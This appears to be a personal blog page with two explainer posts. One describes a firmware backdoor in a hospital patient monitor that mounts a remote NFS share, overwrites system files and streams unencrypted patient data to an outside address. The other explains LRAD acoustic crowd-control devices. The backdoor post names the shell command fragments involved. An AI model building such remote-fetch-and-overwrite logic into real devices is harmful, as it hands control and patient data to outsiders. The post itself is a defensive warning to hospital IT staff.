Tech Explained: Firmware Backdoors

Posted under Educational, Tech Explained, Technology on March 30th, 2025 by

Last month came across a document released by US cyber defence agency and never really got time to look into in detail. I think this deserves more attention. It details that a patient monitor Contec CMS8000, used in many hospitals to track vitals like heart rate and oxygen levels, contains a firmware backdoor.

This backdoor is hardcoded into the device. When it powers on, it quietly tries to connect to a specific IP address not owned by Contec, but a university in China. Once connected, it mounts a remote file system and copies files into critical system directories, overwriting whatever is already there. There’s no integrity check, no version tracking, and no logging. The device just accepts and runs whatever it gets.

Technically, this is done using standard Linux commands like “ifconfig eth0 up” to enable the network, then “mount -t nfs” to reach the remote server, followed by “cp -rf” to replace files. These commands essentially hand over control of the device to whoever controls that IP. Even worse, patient data like ECG, SpO2, and blood pressure is transmitted to that same IP address over port 515 (normally used for old printer systems), not even using proper medical protocols. There’s no encryption, no authentication, just raw patient data streamed out. Meaning, if a remote handler wants, they can get your full data without any fuss. They can also just show any random readings/waveforms on screen with the backdoor. To me, this isn’t just a firmware bug. It’s really badly coded feature or more likely a backdoor for future remote access.

BTW this a white label device sold even in India under different resellers and brand names. Search for similar images on Indiamart or similar, you will get them. I don’t think anyone in India cares where their data ends up. Not sure why there isn’t any media outcry against this locally.

Anyway, if anyone from any hospital IT team is reading this and has this device (or any from its family), please remove network connectivity of this device. In an age where we trust machines with lives, we need to ask: who controls the code inside the box?

If you liked the post, Share it with your friends!

Tech Explained: LRAD & Sound Cannons

Posted under Tech Explained, Technology on March 23rd, 2025 by

Over the last few months, some of you might have heard about the massive Anti corruption protests happening in Serbia. This week, you may have seen some videos online (shared) of protestors being magically moved away from roads via an invisible force. I was fascinated by what was happening but wanted to potentially explain what it was and how it works.

LRAD in use against protestors

The system used there was most likely an LRAD (Long Range Acoustic Device) but this is just an educated guess on my part, not confirmed yet. It’s a non‑lethal tool originally designed for maritime communication to communicate verbal messages over long distance, but that’s now adapted for crowd control. At its core, the LRAD is essentially a high‑powered, directional loudspeaker. Instead of dispersing sound in all directions like your typical speaker, its array of piezoelectric transducers and acoustic horn concentrates sound into a narrow beam. This can emit sound levels that exceed 140-150 dB at close range. That’s like standing right next to a rocket taking off. You are ear drums can go toast. This noise can cause immediate discomfort, disorientation, and force people to step back involuntarily.

LRAD

In some LRAD systems, they use a chirp feature. Meaning, input to the speaker is a varying frequency. When multiple speakers emit sound at a single, fixed frequency, their sound waves overlap and create dead zones due to destructive interference. Chirp prevents the formation of persistent dead zones, ensuring the sound pressure remains uniformly strong and effective across the target area.

In the videos though, I don’t hear some massive sounds, so they might also be using a variation device called sound vortex cannon. Think of this like a shockwave from a jet engine as a single pulse. It can be higher frequency. This can exert physical pressure, literally pushing people backward. Check demo videos online.

It’s wild seeing military tech adapted for civilian use. LRAD has a sister tech called Long Range Area Denial, using microwaves. That’s some next level scary weapon. If there is interest, I will write about it in future.

Video Source: Internet

If you liked the post, Share it with your friends!
1 6 7 8 9
Copyright © 2025 Amaldev. All Rights Reserved.